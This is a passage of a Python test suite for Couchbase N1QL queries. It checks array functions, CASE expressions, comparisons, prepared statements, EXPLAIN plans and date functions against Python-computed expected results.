tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": ["employee-47" if x["name"] == 'employee-1' else x["name"]
for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
def test_array_repeat(self):
self.query = "select ARRAY_REPEAT(2, 2) as num"
actual_result = self.run_cbq_query()
expected_result = [{"num": [2] * 2}]
self._verify_results(actual_result['results'], expected_result)
def test_array_reverse(self):
self.query = "select array_reverse([1,2,3]) as num"
actual_result = self.run_cbq_query()
expected_result = [{"num": [3, 2, 1]}]
self._verify_results(actual_result['results'], expected_result)
def test_array_sort(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_sort(array_agg(distinct test_rate)) as emp_job" + \
" FROM %s GROUP BY job_title ORDER BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"emp_job": [x["test_rate"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
for item in actual_result['results']:
self.assertTrue(item not in expected_result, f"{actual_result} not matching with {expected_result}")
    # This test is not used anywhere
def test_poly_length(self):
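        """For object/array fields (tasks_points, VMs, skills), LENGTH() is
        expected to return NULL for every document, while POLY_LENGTH() returns
        the element count; both are compared against Python-side expectations."""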
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_fields = ['tasks_points', 'VMs', 'skills']
for query_field in query_fields:
self.query = "Select length(%s) as custom_num from %s order by custom_num" % (query_field, query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"custom_num": None} for _ in self.full_list]
self._verify_results(actual_result['results'], expected_result)
self.query = "Select poly_length(%s) as custom_num from %s order by custom_num" % (
query_field, query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"custom_num": len(doc[query_field])}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['custom_num']))
self._verify_results(actual_result['results'], expected_result)
def test_array_agg(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_agg(name) as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_list = self.run_cbq_query()
actual_result = self.sort_nested_list(actual_list['results'])
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_result = self.sort_nested_list(expected_list)
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# EXPRESSIONS
##############################################################################################
def test_case(self):
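        """Check a searched CASE expression that maps join_mo to a season name
        against the equivalent Python mapping over self.full_list."""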
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, CASE WHEN join_mo < 3 OR join_mo > 11 THEN 'winter'" + \
" WHEN join_mo < 6 AND join_mo > 2 THEN 'spring' " + \
"WHEN join_mo < 9 AND join_mo > 5 THEN 'summer' " + \
"ELSE 'autumn' END AS period FROM %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name'],
doc['period']))
expected_result = [{"name": doc['name'],
"period": ((('autumn', 'summer')[doc['join_mo'] in [6, 7, 8]],
'spring')[doc['join_mo'] in [3, 4, 5]], 'winter')
[doc['join_mo'] in [12, 1, 2]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['period']))
self._verify_results(actual_result, expected_result)
def test_case_expr(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, CASE job_title WHEN 'Sales' THEN 'Marketing'" + \
"ELSE job_title END AS dept FROM %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name'],
doc['dept']))
expected_result = [{"name": doc['name'],
"dept": (doc['job_title'], 'Marketing')[doc['job_title'] == 'Sales']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name'],
doc['dept']))
self._verify_results(actual_result, expected_result)
def test_case_arithm(self):
self.query = "SELECT CASE WHEN 1+1=3 THEN 7+7 WHEN 2+2=5 THEN 8+8 ELSE 2 END"
actual_result = self.run_cbq_query()
expected_result = [{"$1": 2}]
self._verify_results(actual_result['results'], expected_result)
def test_in_int(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where join_mo in [1,6]" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc['join_mo'] in [1, 6]]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where join_mo not in [1,6]" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if not (doc['join_mo'] in [1, 6])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_in_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where job_title in ['Sales', 'Support']" % query_bucket
actual_result = self.run_cbq_query()
self.query = "select name from %s where REVERSE(job_title) in ['selaS', 'troppuS']" % query_bucket
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result['results'], actual_result1['results'])
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc['job_title'] in ['Sales', 'Support']]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "select name from %s where job_title not in ['Sales', 'Support']" % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if not (doc['job_title'] in ['Sales', 'Support'])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
def test_prepared_in_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s where job_title in ['Sales', 'Support']" % query_bucket
self.prepared_common_body()
def test_logic_expr(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 > 1 AND tasks_points.task1 < 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if 1 < doc['tasks_points']['task1'] < 4]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_equal_int(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + "tasks_points.task1 = 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if doc['tasks_points']['task1'] == 4]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + "tasks_points.task1 == 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_equal_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s WHERE " % query_bucket + "name = 'employee-4'"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc['name'] == 'employee-4']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT name FROM %s WHERE " % query_bucket + "name == 'employee-4'"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['name']))
self._verify_results(actual_result, expected_result)
def test_comparition_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 != 1 ORDER BY task"
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if doc['tasks_points']['task1'] != 1]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_not_equal_more_less(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 <> 1 ORDER BY task"
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"task": doc['tasks_points']['task1']}
for doc in self.full_list
if doc['tasks_points']['task1'] != 1]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_every_comparision_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory != 5 END) ORDER BY name"
if self.analytics:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory != 5 ) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm['memory'] != 5]) == len(doc["VMs"])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_every_comparision_not_equal_less_more(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <> 5 END) ORDER BY name"
if self.analytics:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <> 5 ) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm['memory'] != 5]) == len(doc["VMs"])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_any_between(self):
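        """Check ANY ... SATISFIES with a BETWEEN condition, combined with a second
        ANY clause and a negated equality, against a Python-side filter over the
        skills and VMs arrays in self.full_list."""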
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
if self.analytics:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' )" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 )" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] in [1, 2, 3, 4, 5]]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_any_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM <= 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
if self.analytics:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' )" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM <= 5 )" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] <= 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_any_more_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM >= 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
if self.analytics:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' )" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM >= 5 )" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] >= 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_prepared_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
self.prepared_common_body()
def test_named_prepared_between(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' END)" + \
" AND (ANY vm IN d.VMs SATISFIES vm.RAM between 1 and 5 END)" + \
"AND NOT (job_title = 'Sales') ORDER BY name"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
name = result['results'][0]['prepareds']['name']
self.query = 'delete from system:prepareds where name = "%s" ' % name
self.run_cbq_query()
self.query = 'select * from system:prepareds where name = "%s" ' % name
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
def test_prepared_comparision_not_equal_less_more(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <> 5 END) ORDER BY name"
self.prepared_common_body()
def test_prepared_comparision_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory != 5 END) ORDER BY name"
self.prepared_common_body()
def test_prepared_more_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory >= 5 END) ORDER BY name"
self.prepared_common_body()
def test_prepared_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES vm.memory <= 5 END) ORDER BY name"
self.prepared_common_body()
def test_let_not_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate != 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] != 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_between(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate between 1 and 3)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": 1 <= doc["test_rate"] <= 3} for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_not_equal_less_more(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate <> 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] != 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_more_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate >= 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] >= 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_let_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select compare from %s let compare = (test_rate <= 2)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"compare": doc["test_rate"] <= 2}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_comparition_equal_not_equal(self):
self.fail_if_no_buckets()
template = "SELECT join_day, join_mo FROM %s WHERE " + \
"join_day == 1 and join_mo != 2 ORDER BY join_day, join_mo"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['join_day'], doc['join_mo']))
expected_result = [{"join_mo": doc['join_mo'], "join_day": doc['join_day']}
for doc in self.full_list
if doc['join_day'] == 1 and doc["join_mo"] != 2]
expected_result = sorted(expected_result, key=lambda doc: (doc['join_day'], doc['join_mo']))
self._verify_results(actual_result, expected_result)
return template
def test_comparition_more_and_less_equal(self):
self.fail_if_no_buckets()
template = "SELECT join_yr, test_rate FROM %s WHERE join_yr >= 2010 AND test_rate <= 4"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['test_rate'], doc['join_yr']))
expected_result = [{"test_rate": doc['test_rate'], "join_yr": doc['join_yr']}
for doc in self.full_list
if doc['test_rate'] <= 4 and
doc['join_yr'] >= 2010]
expected_result = sorted(expected_result, key=lambda doc: (doc['test_rate'], doc['join_yr']))
self._verify_results(actual_result, expected_result)
return template
def test_comparition_null_missing(self):
self.fail_if_no_buckets()
template = "SELECT skills, VMs FROM %s WHERE " + \
"skills is not null AND VMs is not missing"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['VMs'], doc['skills']))
expected_result = [{"VMs": doc['VMs'], "skills": doc['skills']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['VMs'], doc['skills']))
self._verify_results(actual_result, expected_result)
return template
def test_comparition_aggr_fns(self):
self.fail_if_no_buckets()
template = "SELECT count(join_yr) years, sum(test_rate) rate FROM %s"
for query_bucket in self.query_buckets:
self.query = template % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"years": len([doc['join_yr'] for doc in self.full_list]),
"rate": sum([doc['test_rate'] for doc in self.full_list])}]
self.assertTrue(round(actual_result[0]['rate']) == round(expected_result[0]['rate']))
self.assertTrue((actual_result[0]['years']) == (expected_result[0]['years']))
return template
    # This test has no usages anywhere; it only runs the META() projection and makes no assertions
def test_comparition_meta(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT meta(d).id, meta(d).type FROM %s d" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
def test_comparition_more_less_equal(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 >= 1 AND tasks_points.task1 <= 4"
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (
doc['task']))
expected_result = [{"task": doc['tasks_points']['task1']} for doc in self.full_list
if 1 <= doc['tasks_points']['task1'] <= 4]
expected_result = sorted(expected_result, key=lambda doc: (doc['task']))
self._verify_results(actual_result, expected_result)
def test_comparition_expr(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT tasks_points.task1 as task FROM %s WHERE " % query_bucket + \
"tasks_points.task1 > tasks_points.task1"
actual_result = self.run_cbq_query()
self._verify_results(actual_result['results'], [])
def test_arithm(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, SUM(test_rate) % COUNT(distinct join_yr)" + \
" as avg_per_year from {0} group by job_title".format(query_bucket)
if self.analytics:
self.query = "SELECT d.job_title, SUM(d.test_rate) % COUNT(d.join_yr)" + \
" as avg_per_year from {0} d group by d.job_title".format(query_bucket)
actual_result = self.run_cbq_query()
actual_result = [{"job_title": doc["job_title"],
"avg_per_year": round(doc["avg_per_year"], 2)}
for doc in actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"avg_per_year": math.fsum([doc['test_rate']
for doc in self.full_list
if doc['job_title'] == group]) %
len({doc['join_yr'] for doc in self.full_list
if doc['job_title'] == group})}
for group in tmp_groups]
expected_result = [{"job_title": doc["job_title"],
"avg_per_year": round(doc["avg_per_year"], 2)}
for doc in expected_result]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
self.query = "SELECT job_title, (SUM(tasks_points.task1) +" + \
" SUM(tasks_points.task2)) % COUNT(distinct join_yr) as avg_per_year" + \
" from {0} group by job_title".format(query_bucket)
if self.analytics:
self.query = "SELECT d.job_title, (SUM(d.tasks_points.task1) +" + \
" SUM(d.tasks_points.task2)) % COUNT(d.join_yr) as avg_per_year" + \
" from {0} d group by d.job_title".format(query_bucket)
actual_result = self.run_cbq_query()
actual_result = [{"job_title": doc["job_title"],
"avg_per_year": round(doc["avg_per_year"], 2)}
for doc in actual_result['results']]
actual_result = sorted(actual_result, key=lambda doc: (
doc['job_title']))
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_result = [{"job_title": group,
"avg_per_year": (math.fsum([doc['tasks_points']['task1']
for doc in self.full_list
if doc['job_title'] == group]) +
math.fsum([doc['tasks_points']['task2']
for doc in self.full_list
if doc['job_title'] == group])) %
len({doc['join_yr'] for doc in self.full_list
if doc['job_title'] == group})}
for group in tmp_groups]
expected_result = [{"job_title": doc["job_title"],
"avg_per_year": int(round(doc["avg_per_year"], 2))}
for doc in expected_result]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result, expected_result)
# https://issues.couchbase.com/browse/MB-29401
def test_sum_large_negative_numbers(self):
self.fail_if_no_buckets()
self.run_cbq_query(
"insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc1',{ 'f1' : -822337203685477580 })")
self.run_cbq_query(
"insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc2',{ 'f1' : -822337203685477580 })")
self.query = "select SUM(f1) from " + self.query_buckets[0] + " "
result = self.run_cbq_query()
found_result = result['results'][0]['$1']
expected_result = -1644674407370955160
self.assertEqual(found_result, expected_result)
self.run_cbq_query(
"insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc3',{ 'f2' : -822337203685477580 })")
self.run_cbq_query("insert into " + self.query_buckets[0] + " (KEY, VALUE) VALUES ('doc4',{ 'f2' : 10 })")
self.query = "select SUM(f2) from " + self.query_buckets[0] + " "
result = self.run_cbq_query()
found_result = result['results'][0]['$1']
expected_result = -822337203685477570
self.assertEqual(found_result, expected_result)
##############################################################################################
#
# EXPLAIN
##############################################################################################
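    # NOTE: the EXPLAIN tests below do not build a statement themselves; they run whatever is
    # already stored in self.query, so the query must be set by the caller/framework beforehand.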
def test_explain(self):
self.fail_if_no_buckets()
for _ in self.query_buckets:
res = self.run_cbq_query()
self.log.info(res)
plan = self.ExplainPlanHelper(res)
self.assertTrue(plan["~children"][0]["index"] == "#primary",
"Type should be #primary, but is: %s" % plan["~children"][0]["index"])
##############################################################################################
#
# EXPLAIN WITH A PARTICULAR INDEX
##############################################################################################
# Test has no usages anywhere
def test_explain_particular_index(self, index):
self.fail_if_no_buckets()
for _ in self.query_buckets:
res = self.run_cbq_query()
self.log.info(res)
plan = self.ExplainPlanHelper(res)
self.assertTrue(plan['~children'][2]['~child']['~children'][0]['scan']['index'] == index,
"wrong index used")
###############################################################################################
#
# EXPLAIN WITH UNION SCAN: Covering Indexes
##############################################################################################
# Test has no usages anywhere
def test_explain_union(self, index):
self.fail_if_no_buckets()
for _ in self.query_buckets:
res = self.run_cbq_query()
plan = self.ExplainPlanHelper(res)
if "IN" in self.query:
self.assertTrue(plan["~children"][0]["~children"][0]["#operator"] == "DistinctScan",
"DistinctScan Operator is not used by this query")
else:
self.assertTrue(plan["~children"][0]["~children"][0]["#operator"] == "UnionScan",
"UnionScan Operator is not used by this query")
if plan["~children"][0]["~children"][0]["scan"]["#operator"] == "IndexScan":
self.log.info("IndexScan Operator is also used by this query in scans")
else:
self.log.error("IndexScan Operator is not used by this query, Covering Indexes not used properly")
self.fail("IndexScan Operator is not used by this query, Covering Indexes not used properly")
if plan["~children"][0]["~children"][0]["scan"]["index"] == index:
self.log.info("Query is using specified index")
else:
self.log.info("Query is not using specified index")
##############################################################################################
#
# DATETIME
##############################################################################################
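    # The tests below exercise the N1QL clock/date functions and compare them against Python's
    # datetime module, allowing for small clock skew between client and server where needed.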
def test_clock_millis(self):
self.query = "select clock_millis() as now"
res = self.run_cbq_query()
self.assertFalse("error" in str(res).lower())
def test_clock_str(self):
self.query = "select clock_str() as now"
now = datetime.datetime.now()
res = self.run_cbq_query()
expected = "%s-%02d-%02dT" % (now.year, now.month, now.day)
self.assertTrue(res["results"][0]["now"].startswith(expected),
"Result expected: %s. Actual %s" % (expected, res["results"]))
def test_date_add_millis(self):
self.query = "select date_add_millis(clock_millis(), 100, 'day') as now"
now = time.time()
res = self.run_cbq_query()
self.assertTrue((res["results"][0]["now"] > now * 1000 + 100 * 24 * 60 * 60),
"Result expected to be in: [%s ... %s]. Actual %s" % (
now * 1000 + 100 * 24 * 60 * 60, (now + 10) * 1000 + 100 * 24 * 60 * 60, res["results"]))
def test_date_add_str(self):
self.query = "select date_add_str(clock_utc(), 10, 'day') as now"
now = datetime.datetime.utcnow() + datetime.timedelta(days=10)
res = self.run_cbq_query()
expected = "%s-%02d-%02dT%02d:" % (now.year, now.month, now.day, now.hour)
expected_delta = "%s-%02d-%02dT%02d:" % (now.year, now.month, now.day, now.hour + 1)
self.assertTrue(
res["results"][0]["now"].startswith(expected) or res["results"][0]["now"].startswith(expected_delta),
"Result expected: %s. Actual %s" % (expected, res["results"]))
def test_date_diff_millis(self):
self.query = "select date_diff_millis(clock_millis(), date_add_millis(clock_millis(), 100, 'day'), 'day') as " \
"now "
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] == -100,
"Result expected: %s. Actual %s" % (-100, res["results"]))
def test_date_diff_str(self):
self.query = 'select date_diff_str("2014-08-24T01:33:59", "2014-08-24T07:33:59", "minute") as now'
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] == -360,
"Result expected: %s. Actual %s" % (-360, res["results"]))
self.query = 'select date_diff_str("2014-08-24T01:33:59", "2014-08-24T07:33:59", "hour") as now'
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["now"] == -6,
"Result expected: %s. Actual %s" % (-6, res["results"]))
def test_now(self):
self.query = "select now_str() as now"
now = datetime.datetime.now()
today = date.today()
res = self.run_cbq_query()
expected = "%s-%02d-%02dT" % (today.year, today.month, today.day,)
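        # the expected date prefix is computed for reference only; the test just checks the query succeeds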
self.assertFalse("error" in str(res).lower())
def test_hours(self):
self.query = 'select date_part_str(now_utc(), "hour") as hour, ' + \
'date_part_str(now_utc(),"minute") as minute, date_part_str(' + \
'now_utc(),"second") as sec, date_part_str(now_utc(),"millisecond") as msec'
now = datetime.datetime.utcnow()
res = self.run_cbq_query()
self.assertTrue(res["results"][0]["hour"] == now.hour or res["results"][0]["hour"] == (now.hour + 1),
"Result for hours expected: %s. Actual %s" % (now.hour, res["results"]))
self.assertTrue("minute" in res["results"][0], "No minute field")
self.assertTrue("sec" in res["results"][0], "No second field")
self.assertTrue("msec" in res["results"][0], "No msec field")
def test_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'select name, join_yr, join_mo, join_day from %s' % query_bucket + \
' where date_part_str(now_str(),"month") < join_mo AND date_part_str(now_str(),"year")' + \
' > join_yr AND date_part_str(now_str(),"day") < join_day'
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result["results"], key=lambda doc: (doc['name'],
doc['join_yr'],
doc['join_mo'],
doc['join_day']))
today = date.today()
